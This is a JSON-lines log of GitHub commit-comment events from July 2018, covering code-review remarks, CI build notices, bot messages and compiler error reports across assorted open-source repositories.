{"id":"7909987937","type":"CommitCommentEvent","actor":{"login":"schaumb"},"repo":{"name":"j4ts/j4ts-awt-swing"},"payload":{"comment":{"id":29574727,"position":75,"line":182,"path":"src/main/java/javax/swing/JTextArea.java","commit_id":"4e1718aef34fed98c8fbfcd9ccb483c10536a754","created_at":"2018-07-03T03:07:38Z","updated_at":"2018-07-03T03:07:38Z","author_association":"COLLABORATOR","body":"!!!!!!!!!"}},"created_at":"2018-07-03T03:07:38Z"}
{"id":"7909989822","type":"CommitCommentEvent","actor":{"login":"schaumb"},"repo":{"name":"j4ts/j4ts-awt-swing"},"payload":{"comment":{"id":29574728,"position":75,"line":182,"path":"src/main/java/javax/swing/JTextArea.java","commit_id":"4e1718aef34fed98c8fbfcd9ccb483c10536a754","created_at":"2018-07-03T03:08:24Z","updated_at":"2018-07-03T03:08:24Z","author_association":"COLLABORATOR","body":"getHTMLElement().style.minHeight = rows * 25 + \"px\";\r\n\r\nmove to some resize function, and call it"}},"created_at":"2018-07-03T03:08:24Z"}
{"id":"7909989980","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29574729,"position":null,"line":null,"path":null,"commit_id":"f7f5a7f4c4ead12a9a0828093bdcced4081eb809","created_at":"2018-07-03T03:08:28Z","updated_at":"2018-07-03T03:08:28Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.199`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/199) :tada:"}},"created_at":"2018-07-03T03:08:28Z"}
{"id":"7909991822","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29574731,"position":null,"line":null,"path":null,"commit_id":"f7f5a7f4c4ead12a9a0828093bdcced4081eb809","created_at":"2018-07-03T03:09:12Z","updated_at":"2018-07-03T03:09:12Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.301`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/399408259) :tada:"}},"created_at":"2018-07-03T03:09:12Z"}
{"id":"7909996916","type":"CommitCommentEvent","actor":{"login":"puwarun"},"repo":{"name":"puwarun/devops_docker"},"payload":{"comment":{"id":29574734,"position":null,"line":null,"path":null,"commit_id":"5402573497419996b67e1c7e80a062fea6f522f5","created_at":"2018-07-03T03:11:14Z","updated_at":"2018-07-03T03:11:14Z","author_association":"OWNER","body":"d"}},"created_at":"2018-07-03T03:11:14Z"}
{"id":"7910000214","type":"CommitCommentEvent","actor":{"login":"4O4"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29574739,"position":null,"line":null,"path":null,"commit_id":"d28eb11fca544a57cb7906cc6bb55a50d7d55f78","created_at":"2018-07-03T03:12:31Z","updated_at":"2018-07-03T03:12:31Z","author_association":"CONTRIBUTOR","body":"In an ideal world it should have been called getType() but that name is\nalready taken https://wiki.multitheftauto.com/wiki/GetElementType that's\nwhy it must named this way. And it's consistent with getVehicleType() ;)\n\nOn Mon, 2 Jul 2018, 23:44 Patrik Juvonen, <notifications@github.com> wrote:\n\n> In my opinion the OOP method should be called getType rather than\n> getShapeType. Now it's not following the same naming convention as in other\n> classes.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/multitheftauto/mtasa-blue/commit/d28eb11fca544a57cb7906cc6bb55a50d7d55f78#commitcomment-29572547>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEE6A9LQ0Vo81ag6pOJ-VOD4TgSFKwY6ks5uCpRCgaJpZM4U__ET>\n> .\n>\n"}},"created_at":"2018-07-03T03:12:31Z"}
{"id":"7910005017","type":"CommitCommentEvent","actor":{"login":"qcklxw"},"repo":{"name":"WendyLNU/matgenLNU"},"payload":{"comment":{"id":29574742,"position":1,"line":1,"path":"Docs/qichuankai","commit_id":"96dd13be43b7cbc9ae537239b2374f36f3d6844f","created_at":"2018-07-03T03:14:24Z","updated_at":"2018-07-03T03:14:24Z","author_association":"NONE","body":"[Doc1.docx](https://github.com/WendyLNU/matgenLNU/files/2157506/Doc1.docx)\r\n"}},"created_at":"2018-07-03T03:14:24Z"}
{"id":"7910014340","type":"CommitCommentEvent","actor":{"login":"lilixiong2018"},"repo":{"name":"lilixiong2018/DoubleCommander"},"payload":{"comment":{"id":29574751,"position":null,"line":null,"path":null,"commit_id":"3e7ed4d78d84207f4254c4167cd1e93dffb929bb","created_at":"2018-07-03T03:18:07Z","updated_at":"2018-07-03T03:18:07Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/40269098/42196877-b64b2f0e-7eb2-11e8-8fe5-0fa05a8cfa32.png)\r\n"}},"created_at":"2018-07-03T03:18:07Z"}
{"id":"7910014498","type":"CommitCommentEvent","actor":{"login":"Justineo"},"repo":{"name":"vuejs/vue"},"payload":{"comment":{"id":29574752,"position":5,"line":18,"path":"benchmarks/reorder-list/index.html","commit_id":"38d5459e109a83b4992168c673403503278ff3c1","created_at":"2018-07-03T03:18:10Z","updated_at":"2018-07-03T03:18:10Z","author_association":"MEMBER","body":"@wangwei-anye Plesae do not abuse commit comments like this. You can do experiments in your own repo."}},"created_at":"2018-07-03T03:18:10Z"}
{"id":"7910017548","type":"CommitCommentEvent","actor":{"login":"hufeng"},"repo":{"name":"dubbo/dubbo2.js"},"payload":{"comment":{"id":29574754,"position":null,"line":null,"path":null,"commit_id":"3736ee15b9af23d30731414aa965172e64c68eea","created_at":"2018-07-03T03:19:26Z","updated_at":"2018-07-03T03:19:26Z","author_association":"COLLABORATOR","body":"只记录consum方法调用过程中的异常，不去记录每次failed的err信息"}},"created_at":"2018-07-03T03:19:26Z"}
{"id":"7910022278","type":"CommitCommentEvent","actor":{"login":"lyy8510a"},"repo":{"name":"lyy8510a/aio"},"payload":{"comment":{"id":29574762,"position":null,"line":null,"path":null,"commit_id":"23480ed4426da6c088d1f3824fbe9b0358a86c2a","created_at":"2018-07-03T03:21:09Z","updated_at":"2018-07-03T03:21:09Z","author_association":"OWNER","body":"init"}},"created_at":"2018-07-03T03:21:09Z"}
{"id":"7910023808","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-batchtools-feedstock"},"payload":{"comment":{"id":29574764,"position":null,"line":null,"path":null,"commit_id":"a12b64b9fe4054a678de35ce3e903888443549cd","created_at":"2018-07-03T03:21:43Z","updated_at":"2018-07-03T03:21:43Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @nick-youngblut were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-03T03:21:43Z"}
{"id":"7910025027","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-nistunits-feedstock"},"payload":{"comment":{"id":29574765,"position":null,"line":null,"path":null,"commit_id":"aa59502e4d81897f1f0065365a8bf688b7c6dd7d","created_at":"2018-07-03T03:22:11Z","updated_at":"2018-07-03T03:22:11Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @npavlovikj were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-03T03:22:11Z"}
{"id":"7910025064","type":"CommitCommentEvent","actor":{"login":"robthr"},"repo":{"name":"robthr/tbapi"},"payload":{"comment":{"id":29574766,"position":null,"line":null,"path":null,"commit_id":"01907bbc4064ec9633bafc9aeef6477c0d4378bf","created_at":"2018-07-03T03:22:13Z","updated_at":"2018-07-03T03:22:13Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [fix update host and delete house routes](https://trello.com/c/LnwUd6T9/30-fix-update-host-and-delete-house-routes)"}},"created_at":"2018-07-03T03:22:13Z"}
{"id":"7910025628","type":"CommitCommentEvent","actor":{"login":"robthr"},"repo":{"name":"robthr/tbapi"},"payload":{"comment":{"id":29574767,"position":null,"line":null,"path":null,"commit_id":"01907bbc4064ec9633bafc9aeef6477c0d4378bf","created_at":"2018-07-03T03:22:26Z","updated_at":"2018-07-03T03:22:26Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create sounds and log folder if doesnt exist](https://trello.com/c/9qIsl5uR/28-create-sounds-and-log-folder-if-doesnt-exist)"}},"created_at":"2018-07-03T03:22:26Z"}
{"id":"7910046516","type":"CommitCommentEvent","actor":{"login":"lfalvarez"},"repo":{"name":"ciudadanointeligente/votainteligente-portal-electoral"},"payload":{"comment":{"id":29574784,"position":null,"line":null,"path":null,"commit_id":"f4c9619105b849f99617fcf6459b344c4a4f8b91","created_at":"2018-07-03T03:30:38Z","updated_at":"2018-07-03T03:30:38Z","author_association":"MEMBER","body":":soccer: :soccer: :soccer: "}},"created_at":"2018-07-03T03:30:38Z"}
{"id":"7910046704","type":"CommitCommentEvent","actor":{"login":"johnkingsly"},"repo":{"name":"johnkingsly/Test"},"payload":{"comment":{"id":29574785,"position":null,"line":null,"path":null,"commit_id":"4ada7de29de9c139a4c69e9b901cc8ea93ba9b8e","created_at":"2018-07-03T03:30:42Z","updated_at":"2018-07-03T03:30:42Z","author_association":"OWNER","body":"Merged Lavanya changes"}},"created_at":"2018-07-03T03:30:42Z"}
{"id":"7910047824","type":"CommitCommentEvent","actor":{"login":"inakamon"},"repo":{"name":"inakamon/-github"},"payload":{"comment":{"id":29574786,"position":null,"line":null,"path":null,"commit_id":"6193fc78c019da9bcfb450b159b54f16ce26e7ed","created_at":"2018-07-03T03:31:06Z","updated_at":"2018-07-03T03:31:06Z","author_association":"OWNER","body":"まったくのはじめてで、Githubの使い方がわかりません。\r\n誰か教えてください。\r\nGithubを利用しようとした目的は、node.jsをしていて、ここにたどり着きました。\r\nnode.jsもまったくのはじめてで、よくわかりません。\r\nどうぞ、よろしくお願いします。\r\n環境はwindows10で、ブラウザーはGoogle Chromeです。"}},"created_at":"2018-07-03T03:31:06Z"}
{"id":"7910049249","type":"CommitCommentEvent","actor":{"login":"Francommit"},"repo":{"name":"PRElias/win10_emulation_station"},"payload":{"comment":{"id":29574788,"position":null,"line":null,"path":null,"commit_id":"5f1a6ed2d43da585b6d854ab0de0503d08a8a71e","created_at":"2018-07-03T03:31:38Z","updated_at":"2018-07-03T03:31:38Z","author_association":"NONE","body":"@PRElias could you please put English comments in the script please?"}},"created_at":"2018-07-03T03:31:38Z"}
{"id":"7910051886","type":"CommitCommentEvent","actor":{"login":"Francommit"},"repo":{"name":"PRElias/win10_emulation_station"},"payload":{"comment":{"id":29574791,"position":11,"line":11,"path":"prepare.ps1","commit_id":"5f1a6ed2d43da585b6d854ab0de0503d08a8a71e","created_at":"2018-07-03T03:32:36Z","updated_at":"2018-07-03T03:32:36Z","author_association":"NONE","body":"Are you trying to refresh the path here so you can install chocolatey and use it in the same scope?\r\nPretty sure this only works in version 5+ of Powershell... though I might be wrong."}},"created_at":"2018-07-03T03:32:36Z"}
{"id":"7910054103","type":"CommitCommentEvent","actor":{"login":"Francommit"},"repo":{"name":"PRElias/win10_emulation_station"},"payload":{"comment":{"id":29574799,"position":2,"line":2,"path":"prepare.ps1","commit_id":"5f1a6ed2d43da585b6d854ab0de0503d08a8a71e","created_at":"2018-07-03T03:33:29Z","updated_at":"2018-07-03T03:33:29Z","author_association":"NONE","body":"I'm fairly certain you can't execute a script in Admin without having set it outside the scope of the script itself.\r\n\r\nOtherwise people could just write whatever they wanted in a malicious script."}},"created_at":"2018-07-03T03:33:29Z"}
{"id":"7910056529","type":"CommitCommentEvent","actor":{"login":"Monicatong"},"repo":{"name":"programthink/zhao"},"payload":{"comment":{"id":29574801,"position":null,"line":null,"path":null,"commit_id":"bc99aaac7b280140c5996aad47e3094de512f7db","created_at":"2018-07-03T03:34:27Z","updated_at":"2018-07-03T03:34:27Z","author_association":"NONE","body":"sjihdgwe"}},"created_at":"2018-07-03T03:34:27Z"}
{"id":"7910056634","type":"CommitCommentEvent","actor":{"login":"Francommit"},"repo":{"name":"PRElias/win10_emulation_station"},"payload":{"comment":{"id":29574802,"position":null,"line":null,"path":null,"commit_id":"8157134cf7683c68a4b9afd4897415fe1e004689","created_at":"2018-07-03T03:34:29Z","updated_at":"2018-07-03T03:34:29Z","author_association":"NONE","body":"Oooh nice one! Totally slipped my mind!"}},"created_at":"2018-07-03T03:34:29Z"}
{"id":"7910058823","type":"CommitCommentEvent","actor":{"login":"erikzhang"},"repo":{"name":"neo-project/neo-plugins"},"payload":{"comment":{"id":29574804,"position":null,"line":null,"path":null,"commit_id":"60fce608fdd8c53b020833c02f00189ab515f8c9","created_at":"2018-07-03T03:35:21Z","updated_at":"2018-07-03T03:35:21Z","author_association":"MEMBER","body":"Yes."}},"created_at":"2018-07-03T03:35:21Z"}
{"id":"7910062464","type":"CommitCommentEvent","actor":{"login":"Francommit"},"repo":{"name":"PRElias/win10_emulation_station"},"payload":{"comment":{"id":29574809,"position":null,"line":null,"path":null,"commit_id":"95534fa682204a63aed5d20b3b2b9aa3aa8d462e","created_at":"2018-07-03T03:36:51Z","updated_at":"2018-07-03T03:36:51Z","author_association":"NONE","body":"Hmmm unsure how I feel about this. The idea was to make it as 'hands-free' as possible. To your average user, I'm sure they don't even know what OneDrive is or has activated it at all."}},"created_at":"2018-07-03T03:36:51Z"}
{"id":"7910067641","type":"CommitCommentEvent","actor":{"login":"95hx"},"repo":{"name":"95hx/Cplusplus-Concurrency-In-Practice"},"payload":{"comment":{"id":29574814,"position":null,"line":null,"path":null,"commit_id":"9baed5569f3ec09ec30207a2a4c65eb4b116502a","created_at":"2018-07-03T03:38:54Z","updated_at":"2018-07-03T03:38:54Z","author_association":"OWNER","body":"add my describe"}},"created_at":"2018-07-03T03:38:54Z"}
{"id":"7910070567","type":"CommitCommentEvent","actor":{"login":"ishaanv"},"repo":{"name":"bvn-architecture/techtree"},"payload":{"comment":{"id":29574819,"position":null,"line":null,"path":null,"commit_id":"6ec458bf5b0ddf6478f6aa14bf27dcf2061a13ed","created_at":"2018-07-03T03:40:07Z","updated_at":"2018-07-03T03:40:07Z","author_association":"MEMBER","body":"It's because I wrapped the whole thing with `d3.json` (hack I mentioned)"}},"created_at":"2018-07-03T03:40:07Z"}
{"id":"7910079996","type":"CommitCommentEvent","actor":{"login":"HookyQR"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":29574829,"position":5,"line":166,"path":"src/vs/workbench/parts/webview/electron-browser/webviewEditor.ts","commit_id":"74fcd9ae313957df6ed910966616225d67831a24","created_at":"2018-07-03T03:43:53Z","updated_at":"2018-07-03T03:43:53Z","author_association":"NONE","body":"This broke the build (Compile Source) because of a now unused reference to `TPromise` at line 11, which means PR test can't pass. 😢 "}},"created_at":"2018-07-03T03:43:53Z"}
{"id":"7910081136","type":"CommitCommentEvent","actor":{"login":"SuburbiaXD"},"repo":{"name":"SuburbiaXD/invie"},"payload":{"comment":{"id":29574832,"position":null,"line":null,"path":null,"commit_id":"a8bcc9999aeebaefbc1dab8bd738a4d57de6c653","created_at":"2018-07-03T03:44:21Z","updated_at":"2018-07-03T03:44:21Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-03T03:44:21Z"}
{"id":"7910082385","type":"CommitCommentEvent","actor":{"login":"del-db-run"},"repo":{"name":"del-db-run/HelloWorld"},"payload":{"comment":{"id":29574836,"position":null,"line":null,"path":null,"commit_id":"3a5c534c6c5825f311b40d8f873216e69e68f6cf","created_at":"2018-07-03T03:44:52Z","updated_at":"2018-07-03T03:44:52Z","author_association":"OWNER","body":"agree"}},"created_at":"2018-07-03T03:44:52Z"}
{"id":"7910083154","type":"CommitCommentEvent","actor":{"login":"del-db-run"},"repo":{"name":"del-db-run/HelloWorld"},"payload":{"comment":{"id":29574840,"position":null,"line":null,"path":null,"commit_id":"3a5c534c6c5825f311b40d8f873216e69e68f6cf","created_at":"2018-07-03T03:45:11Z","updated_at":"2018-07-03T03:45:11Z","author_association":"OWNER","body":"tongyi qingqiu"}},"created_at":"2018-07-03T03:45:11Z"}
{"id":"7910086084","type":"CommitCommentEvent","actor":{"login":"agude"},"repo":{"name":"jaganmohan/Embeddings"},"payload":{"comment":{"id":29574852,"position":1,"line":1,"path":"synonyms/config.prop","commit_id":"e546637a653a8dbdb7369b62d664b4531f3fb65d","created_at":"2018-07-03T03:46:19Z","updated_at":"2018-07-03T03:46:19Z","author_association":"NONE","body":"`0.0.0.0` is a weird IP address. I suspect you want something like `localhost` or `127.0.0.1`\r\n\r\nhttps://stackoverflow.com/a/20778887"}},"created_at":"2018-07-03T03:46:19Z"}
{"id":"7910087762","type":"CommitCommentEvent","actor":{"login":"claymccoy"},"repo":{"name":"atomist/sdm-smoke-test"},"payload":{"comment":{"id":29574855,"position":null,"line":null,"path":null,"commit_id":"2e50889d67d496f5b707d08b4d00fc83e1df5eb7","created_at":"2018-07-03T03:47:03Z","updated_at":"2018-07-03T03:47:03Z","author_association":"CONTRIBUTOR","body":"@johnsonr Is this expected?"}},"created_at":"2018-07-03T03:47:03Z"}
{"id":"7910088040","type":"CommitCommentEvent","actor":{"login":"ctram"},"repo":{"name":"codeforsanjose/upfront-info"},"payload":{"comment":{"id":29574856,"position":5,"line":43,"path":"src/components/ZoningLookupStatement.jsx","commit_id":"22e86462f5a42df30c99e96c1694800cd984ecec","created_at":"2018-07-03T03:47:10Z","updated_at":"2018-07-03T03:47:10Z","author_association":"NONE","body":"@CelesteComet Hello, what is this change for? It is causing an error on my local."}},"created_at":"2018-07-03T03:47:10Z"}
{"id":"7910088808","type":"CommitCommentEvent","actor":{"login":"agude"},"repo":{"name":"jaganmohan/Embeddings"},"payload":{"comment":{"id":29574858,"position":1,"line":1,"path":"synonyms/findsimilar.py","commit_id":"e546637a653a8dbdb7369b62d664b4531f3fb65d","created_at":"2018-07-03T03:47:29Z","updated_at":"2018-07-03T03:47:29Z","author_association":"NONE","body":"Generally `import`s are grouped together. Often they are separated into groups like:\r\n\r\n```\r\nimport standard_library_stuff\r\n\r\nimport third_party_library_stuff\r\n\r\nimport my_library_stuff\r\n```\r\n\r\nBut that's not critical."}},"created_at":"2018-07-03T03:47:29Z"}
{"id":"7910093384","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29574863,"position":null,"line":null,"path":null,"commit_id":"de3daacd3abf2c6c6a131e705aa23af0297d83dd","created_at":"2018-07-03T03:49:14Z","updated_at":"2018-07-03T03:49:14Z","author_association":"NONE","body":"Congrats!  Nice to see you're back :-)"}},"created_at":"2018-07-03T03:49:14Z"}
{"id":"7910095030","type":"CommitCommentEvent","actor":{"login":"agude"},"repo":{"name":"jaganmohan/Embeddings"},"payload":{"comment":{"id":29574864,"position":27,"line":27,"path":"synonyms/findsimilar.py","commit_id":"e546637a653a8dbdb7369b62d664b4531f3fb65d","created_at":"2018-07-03T03:49:46Z","updated_at":"2018-07-03T03:49:46Z","author_association":"NONE","body":"I'd look at the logging library to replace prints."}},"created_at":"2018-07-03T03:49:46Z"}
{"id":"7910095903","type":"CommitCommentEvent","actor":{"login":"agude"},"repo":{"name":"jaganmohan/Embeddings"},"payload":{"comment":{"id":29574866,"position":29,"line":29,"path":"synonyms/findsimilar.py","commit_id":"e546637a653a8dbdb7369b62d664b4531f3fb65d","created_at":"2018-07-03T03:50:06Z","updated_at":"2018-07-03T03:50:06Z","author_association":"NONE","body":"Dead code should probably not be in master. This is where branches shine."}},"created_at":"2018-07-03T03:50:06Z"}
{"id":"7910097954","type":"CommitCommentEvent","actor":{"login":"agude"},"repo":{"name":"jaganmohan/Embeddings"},"payload":{"comment":{"id":29574867,"position":41,"line":41,"path":"synonyms/findsimilar.py","commit_id":"e546637a653a8dbdb7369b62d664b4531f3fb65d","created_at":"2018-07-03T03:50:43Z","updated_at":"2018-07-03T03:50:43Z","author_association":"NONE","body":"You're mixing implicit and explicit `--` in your argument flags. I'd go implicit and drop the `--` from the strings here."}},"created_at":"2018-07-03T03:50:43Z"}
{"id":"7910100090","type":"CommitCommentEvent","actor":{"login":"agude"},"repo":{"name":"jaganmohan/Embeddings"},"payload":{"comment":{"id":29574868,"position":10,"line":10,"path":"synonyms/ml/.ipynb_checkpoints/inputgen-checkpoint.py","commit_id":"e546637a653a8dbdb7369b62d664b4531f3fb65d","created_at":"2018-07-03T03:51:30Z","updated_at":"2018-07-03T03:51:30Z","author_association":"NONE","body":"Your library is mixing 2 and 4 space indents. I'd go with one style."}},"created_at":"2018-07-03T03:51:30Z"}
{"id":"7910102628","type":"CommitCommentEvent","actor":{"login":"agude"},"repo":{"name":"jaganmohan/Embeddings"},"payload":{"comment":{"id":29574871,"position":13,"line":13,"path":"synonyms/ml/.ipynb_checkpoints/inputgen-checkpoint.py","commit_id":"e546637a653a8dbdb7369b62d664b4531f3fb65d","created_at":"2018-07-03T03:52:17Z","updated_at":"2018-07-03T03:52:17Z","author_association":"NONE","body":"This file could definitely use some line breaks and comments to help the user read it."}},"created_at":"2018-07-03T03:52:17Z"}
{"id":"7910104699","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/online-orientation"},"payload":{"comment":{"id":29574872,"position":null,"line":null,"path":null,"commit_id":"444bb677c43f704b102e4203574bf5eeaae43170","created_at":"2018-07-03T03:52:51Z","updated_at":"2018-07-03T03:52:51Z","author_association":"COLLABORATOR","body":"Created multidev environment [online-orientation#ci-184](https://dashboard.pantheon.io/sites/714bd05e-1a33-4f35-93a2-e9d6add67063#ci-184).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-184-online-orientation.pantheonsite.io/)"}},"created_at":"2018-07-03T03:52:51Z"}
{"id":"7910109087","type":"CommitCommentEvent","actor":{"login":"apmuthu"},"repo":{"name":"braathwaate/frontac24"},"payload":{"comment":{"id":29574877,"position":4,"line":5737,"path":"core/reporting/includes/tcpdf.php","commit_id":"9dca888afe9423ed38cf28a8ef93ffb1cf0d5184","created_at":"2018-07-03T03:54:32Z","updated_at":"2018-07-03T03:54:32Z","author_association":"NONE","body":"Why have the above `if` statement at all and the next `return` as well?"}},"created_at":"2018-07-03T03:54:32Z"}
{"id":"7910109096","type":"CommitCommentEvent","actor":{"login":"agude"},"repo":{"name":"jaganmohan/Embeddings"},"payload":{"comment":{"id":29574878,"position":226,"line":226,"path":"synonyms/ml/.ipynb_checkpoints/model-checkpoint.py","commit_id":"e546637a653a8dbdb7369b62d664b4531f3fb65d","created_at":"2018-07-03T03:54:33Z","updated_at":"2018-07-03T03:54:33Z","author_association":"NONE","body":"This file is really nice!"}},"created_at":"2018-07-03T03:54:33Z"}
{"id":"7910110224","type":"CommitCommentEvent","actor":{"login":"agude"},"repo":{"name":"jaganmohan/Embeddings"},"payload":{"comment":{"id":29574881,"position":9,"line":9,"path":"synonyms/ml/inputgen.py","commit_id":"e546637a653a8dbdb7369b62d664b4531f3fb65d","created_at":"2018-07-03T03:55:03Z","updated_at":"2018-07-03T03:55:03Z","author_association":"NONE","body":"Again, tough to read giant blocks."}},"created_at":"2018-07-03T03:55:03Z"}
{"id":"7910111122","type":"CommitCommentEvent","actor":{"login":"agude"},"repo":{"name":"jaganmohan/Embeddings"},"payload":{"comment":{"id":29574884,"position":1,"line":1,"path":"synonyms/ml/model.py","commit_id":"e546637a653a8dbdb7369b62d664b4531f3fb65d","created_at":"2018-07-03T03:55:26Z","updated_at":"2018-07-03T03:55:26Z","author_association":"NONE","body":"Isn't this file a dupe of the one above?"}},"created_at":"2018-07-03T03:55:26Z"}
{"id":"7910113160","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29574887,"position":null,"line":null,"path":null,"commit_id":"051056b4fd2208866237edafbe712a05e540fb2f","created_at":"2018-07-03T03:56:13Z","updated_at":"2018-07-03T03:56:13Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-03T03:56:13Z"}
{"id":"7910121659","type":"CommitCommentEvent","actor":{"login":"LALAP0"},"repo":{"name":"KelMoR/FirstGitProyect-IccUTEC"},"payload":{"comment":{"id":29574902,"position":null,"line":null,"path":null,"commit_id":"f1cbf254b575a639ab4349afe23329f9019f19d2","created_at":"2018-07-03T03:59:48Z","updated_at":"2018-07-03T03:59:48Z","author_association":"NONE","body":"I like this idea. "}},"created_at":"2018-07-03T03:59:48Z"}
{"id":"7910125268","type":"CommitCommentEvent","actor":{"login":"Hendryputra"},"repo":{"name":"Hendryputra/ut-cm"},"payload":{"comment":{"id":29574913,"position":null,"line":null,"path":null,"commit_id":"1be3c9ac313d4b1f62fb0ccc4ffdb88b66dee2a2","created_at":"2018-07-03T04:01:14Z","updated_at":"2018-07-03T04:01:14Z","author_association":"OWNER","body":"kasian"}},"created_at":"2018-07-03T04:01:14Z"}
{"id":"7910126174","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/online-orientation"},"payload":{"comment":{"id":29574915,"position":null,"line":null,"path":null,"commit_id":"9e54c53f3fda20d8e7206fd2ab2affb4358105e5","created_at":"2018-07-03T04:01:36Z","updated_at":"2018-07-03T04:01:36Z","author_association":"COLLABORATOR","body":"Created multidev environment [online-orientation#pr-12](https://dashboard.pantheon.io/sites/714bd05e-1a33-4f35-93a2-e9d6add67063#pr-12).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-12-online-orientation.pantheonsite.io/)"}},"created_at":"2018-07-03T04:01:36Z"}
{"id":"7910127639","type":"CommitCommentEvent","actor":{"login":"andyli"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":29574917,"position":null,"line":null,"path":null,"commit_id":"4a7a9bf57005e634711ee8735a886fc6d0c6a0b7","created_at":"2018-07-03T04:02:14Z","updated_at":"2018-07-03T04:02:14Z","author_association":"MEMBER","body":"```\r\nUncaught exception Incompatibilities between haxe.ds._Vector.VectorData in cpp,cs,flash,hl,java,js,lua,macro,neko and php (could not merge definition)\r\n```\r\n...from https://travis-ci.org/HaxeFoundation/api.haxe.org/builds/397746442"}},"created_at":"2018-07-03T04:02:14Z"}
{"id":"7910128550","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29574918,"position":null,"line":null,"path":null,"commit_id":"051056b4fd2208866237edafbe712a05e540fb2f","created_at":"2018-07-03T04:02:38Z","updated_at":"2018-07-03T04:02:38Z","author_association":"NONE","body":"Something went wrong when running [your job](https://github.com/JuliaLang/julia/commit/051056b4fd2208866237edafbe712a05e540fb2f#commitcomment-29574887):\n```\nNanosoldierError: failed to run benchmarks against primary commit: failed process: Process(`make -j3`, ProcessExited(2)) [2]\n```\nLogs and partial data can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/75d81923081c3086d7679cc5a48411b800064c22/daily_2018_7_3/report.md)\ncc @ararslan"}},"created_at":"2018-07-03T04:02:38Z"}
{"id":"7910143313","type":"CommitCommentEvent","actor":{"login":"ljjb"},"repo":{"name":"automatak/dnp3"},"payload":{"comment":{"id":29574931,"position":40,"line":65,"path":"cpp/libs/src/opendnp3/app/parsing/APDUHeaderParser.h","commit_id":"c21a51b174a297be0d6d2bfb17243df1ed628307","created_at":"2018-07-03T04:08:42Z","updated_at":"2018-07-03T04:08:42Z","author_association":"NONE","body":"Thank you, here is my error (which I've worked around for the moment by removing the const qualifiers):\r\n```\r\n/path/to/my-project/dnp3/cpp/libs/src/opendnp3/app/parsing/APDUHeaderParser.h:65:3: error:\r\n      constructor for 'opendnp3::APDUHeaderParser::Result<opendnp3::APDUHeader>' must explicitly initialize the\r\n      const member 'header'\r\n  Result() : success(false)\r\n  ^\r\n/path/to/my-project/dnp3/cpp/libs/src/opendnp3/app/parsing/APDUHeaderParser.h:54:11: note:\r\n      in instantiation of member function 'opendnp3::APDUHeaderParser::Result<opendnp3::APDUHeader>::Result'\r\n      requested here\r\n   return Result();\r\n```\r\n\r\n\r\nMy output for `g++ -v` is:\r\n```\r\nConfigured with: --prefix=/Applications/Xcode.app/Contents/Developer/usr --with-gxx-include-dir=/usr/include/c++/4.2.1\r\nApple LLVM version 8.0.0 (clang-800.0.42.1)\r\nTarget: x86_64-apple-darwin16.7.0\r\nThread model: posix\r\nInstalledDir: /Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin```"}},"created_at":"2018-07-03T04:08:42Z"}
